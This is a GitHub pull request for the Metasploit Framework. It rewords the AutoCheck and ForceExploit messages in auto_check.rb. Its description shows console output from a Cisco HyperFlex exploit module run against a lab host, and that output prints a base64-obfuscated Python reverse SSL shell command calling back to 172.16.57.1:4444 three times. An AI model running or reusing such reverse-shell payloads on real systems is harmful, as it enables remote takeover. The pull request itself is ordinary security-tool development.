Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Improve AutoCheck user experience (prints, etc.) #15399

Merged
merged 3 commits into from
Jul 7, 2021
Merged

Improve AutoCheck user experience (prints, etc.) #15399

merged 3 commits into from
Jul 7, 2021

Conversation

wvu
Copy link
Contributor

@wvu wvu commented Jul 7, 2021
edited
Loading

Words are hard. If I break master, I'll fix it. (:

msf6 exploit(linux/http/cisco_hyperflex_hx_data_platform_cmd_exec) > run

[*] Started reverse SSL handler on 172.16.57.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. Storfs ASUP servlet detected.
[*] Selected cmd/unix/reverse_python_ssl (Unix Command)
[*] Executing command: python -c "exec(__import__('base64').b64decode(__import__('codecs').getencoder('utf-8')('aW1wb3J0IHNvY2tldCxzdWJwcm9jZXNzLG9zLHNzbApzbz1zb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVULHNvY2tldC5TT0NLX1NUUkVBTSkKc28uY29ubmVjdCgoJzE3Mi4xNi41Ny4xJyw0NDQ0KSkKcz1zc2wud3JhcF9zb2NrZXQoc28pCldhPUZhbHNlCndoaWxlIG5vdCBXYToKCWRhdGE9cy5yZWN2KDEwMjQpCglpZiBsZW4oZGF0YSk9PTA6CgkJV2EgPSBUcnVlCglwcm9jPXN1YnByb2Nlc3MuUG9wZW4oZGF0YSxzaGVsbD1UcnVlLHN0ZG91dD1zdWJwcm9jZXNzLlBJUEUsc3RkZXJyPXN1YnByb2Nlc3MuUElQRSxzdGRpbj1zdWJwcm9jZXNzLlBJUEUpCglzdGRvdXRfdmFsdWU9cHJvYy5zdGRvdXQucmVhZCgpICsgcHJvYy5zdGRlcnIucmVhZCgpCglzLnNlbmQoc3Rkb3V0X3ZhbHVlKQo=')[0]))"
[*] Command shell session 1 opened (172.16.57.1:4444 -> 172.16.57.4:55064) at 2021-07-06 21:38:27 -0500
[!] Command execution timed out

^C
Abort session 1? [y/N]  y

[*] 172.16.57.4 - Command shell session 1 closed.  Reason: User exit
msf6 exploit(linux/http/cisco_hyperflex_hx_data_platform_cmd_exec) > set AutoCheck false
AutoCheck => false
msf6 exploit(linux/http/cisco_hyperflex_hx_data_platform_cmd_exec) > run

[*] Started reverse SSL handler on 172.16.57.1:4444
[!] AutoCheck is disabled, proceeding with exploitation
[*] Selected cmd/unix/reverse_python_ssl (Unix Command)
[*] Executing command: python -c "exec(__import__('base64').b64decode(__import__('codecs').getencoder('utf-8')('aW1wb3J0IHNvY2tldCxzdWJwcm9jZXNzLG9zLHNzbApzbz1zb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVULHNvY2tldC5TT0NLX1NUUkVBTSkKc28uY29ubmVjdCgoJzE3Mi4xNi41Ny4xJyw0NDQ0KSkKcz1zc2wud3JhcF9zb2NrZXQoc28pCm5uPUZhbHNlCndoaWxlIG5vdCBubjoKCWRhdGE9cy5yZWN2KDEwMjQpCglpZiBsZW4oZGF0YSk9PTA6CgkJbm4gPSBUcnVlCglwcm9jPXN1YnByb2Nlc3MuUG9wZW4oZGF0YSxzaGVsbD1UcnVlLHN0ZG91dD1zdWJwcm9jZXNzLlBJUEUsc3RkZXJyPXN1YnByb2Nlc3MuUElQRSxzdGRpbj1zdWJwcm9jZXNzLlBJUEUpCglzdGRvdXRfdmFsdWU9cHJvYy5zdGRvdXQucmVhZCgpICsgcHJvYy5zdGRlcnIucmVhZCgpCglzLnNlbmQoc3Rkb3V0X3ZhbHVlKQo=')[0]))"
[*] Command shell session 2 opened (172.16.57.1:4444 -> 172.16.57.4:55068) at 2021-07-06 21:38:37 -0500
[!] Command execution timed out

^C
Abort session 2? [y/N]  y

[*] 172.16.57.4 - Command shell session 2 closed.  Reason: User exit
msf6 exploit(linux/http/cisco_hyperflex_hx_data_platform_cmd_exec) > set AutoCheck true
AutoCheck => true
msf6 exploit(linux/http/cisco_hyperflex_hx_data_platform_cmd_exec) > edit
msf6 exploit(linux/http/cisco_hyperflex_hx_data_platform_cmd_exec) > rerun
[*] Reloading module...

[*] Started reverse SSL handler on 172.16.57.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[-] Exploit aborted due to failure: not-vulnerable: The target is not exploitable. "set ForceExploit true" to override check result.
[*] Exploit completed, but no session was created.
msf6 exploit(linux/http/cisco_hyperflex_hx_data_platform_cmd_exec) > set ForceExploit true
ForceExploit => true
msf6 exploit(linux/http/cisco_hyperflex_hx_data_platform_cmd_exec) > run

[*] Started reverse SSL handler on 172.16.57.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[!] The target is not exploitable. ForceExploit is enabled, proceeding with exploitation.
[*] Selected cmd/unix/reverse_python_ssl (Unix Command)
[*] Executing command: python -c "exec(__import__('base64').b64decode(__import__('codecs').getencoder('utf-8')('aW1wb3J0IHNvY2tldCxzdWJwcm9jZXNzLG9zLHNzbApzbz1zb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVULHNvY2tldC5TT0NLX1NUUkVBTSkKc28uY29ubmVjdCgoJzE3Mi4xNi41Ny4xJyw0NDQ0KSkKcz1zc2wud3JhcF9zb2NrZXQoc28pCnB2PUZhbHNlCndoaWxlIG5vdCBwdjoKCWRhdGE9cy5yZWN2KDEwMjQpCglpZiBsZW4oZGF0YSk9PTA6CgkJcHYgPSBUcnVlCglwcm9jPXN1YnByb2Nlc3MuUG9wZW4oZGF0YSxzaGVsbD1UcnVlLHN0ZG91dD1zdWJwcm9jZXNzLlBJUEUsc3RkZXJyPXN1YnByb2Nlc3MuUElQRSxzdGRpbj1zdWJwcm9jZXNzLlBJUEUpCglzdGRvdXRfdmFsdWU9cHJvYy5zdGRvdXQucmVhZCgpICsgcHJvYy5zdGRlcnIucmVhZCgpCglzLnNlbmQoc3Rkb3V0X3ZhbHVlKQo=')[0]))"
[*] Command shell session 3 opened (172.16.57.1:4444 -> 172.16.57.4:55076) at 2021-07-06 21:39:06 -0500
[!] Command execution timed out

Fixes #12853. For #15398.

@wvu wvu added library bug rn-no-release-notes no release notes code quality Improving code quality labels Jul 7, 2021
@wvu wvu requested a review from adfoster-r7 July 7, 2021 02:46
@wvu wvu self-assigned this Jul 7, 2021
wvu
wvu commented Jul 7, 2021
View reviewed changes
lib/msf/core/exploit/remote/auto_check.rb
end

def initialize(info = {})
super

register_advanced_options([
OptBool.new('AutoCheck', [false, 'Run check before exploitation', true]),
OptBool.new('AutoCheck', [false, 'Run check before exploit', true]),
Copy link
Contributor Author

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

This sounds grammatically more natural in the context of an exploit.

wvu
wvu commented Jul 7, 2021
View reviewed changes
lib/msf/core/exploit/remote/auto_check.rb
@@ -36,10 +36,10 @@ def with_prepended_auto_check
return yield
end

print_status('Executing automatic check (disable AutoCheck to override)')
print_status('Running automatic check ("set AutoCheck false" to disable)')
Copy link
Contributor Author

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

This is more consistent with the option description and behavior (and avoids semantic satiation). Also adds a handy example.

wvu
wvu commented Jul 7, 2021
View reviewed changes
lib/msf/core/exploit/remote/auto_check.rb

warning_msg = 'ForceExploit is enabled, proceeding with exploitation.'
error_msg = 'Enable ForceExploit to override check result.'
error_msg = '"set ForceExploit true" to override check result.'
Copy link
Contributor Author

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Handy example++.

wvu
wvu commented Jul 7, 2021
View reviewed changes
lib/msf/core/exploit/remote/auto_check.rb
@@ -54,8 +54,7 @@ def with_prepended_auto_check
return yield
end

fail_with(Module::Failure::NotVulnerable,
"#{checkcode.message} #{error_msg}")
fail_with(Module::Failure::NotVulnerable, "#{checkcode.message} #{error_msg}")
Copy link
Contributor Author

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

80 columns be damned.

@wvu wvu merged commit 5d01912 into rapid7:master Jul 7, 2021
@wvu wvu deleted the bug/autocheck branch July 7, 2021 03:21
adfoster-r7
adfoster-r7 reviewed Jul 7, 2021
View reviewed changes
Copy link
Contributor

@adfoster-r7 adfoster-r7 left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

:shipit:

@wvu wvu mentioned this pull request Jul 9, 2021
Merged
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers

@adfoster-r7 adfoster-r7 adfoster-r7 left review comments

Assignees

@wvu wvu

Labels
bug code quality Improving code quality library rn-no-release-notes no release notes
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.
2 participants
@wvu @adfoster-r7